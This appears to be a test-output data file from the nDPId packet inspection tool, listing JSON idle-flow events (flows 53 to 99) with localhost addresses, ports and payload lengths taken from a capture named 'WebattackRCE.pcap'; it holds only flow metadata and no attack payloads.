-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7440000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7440000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 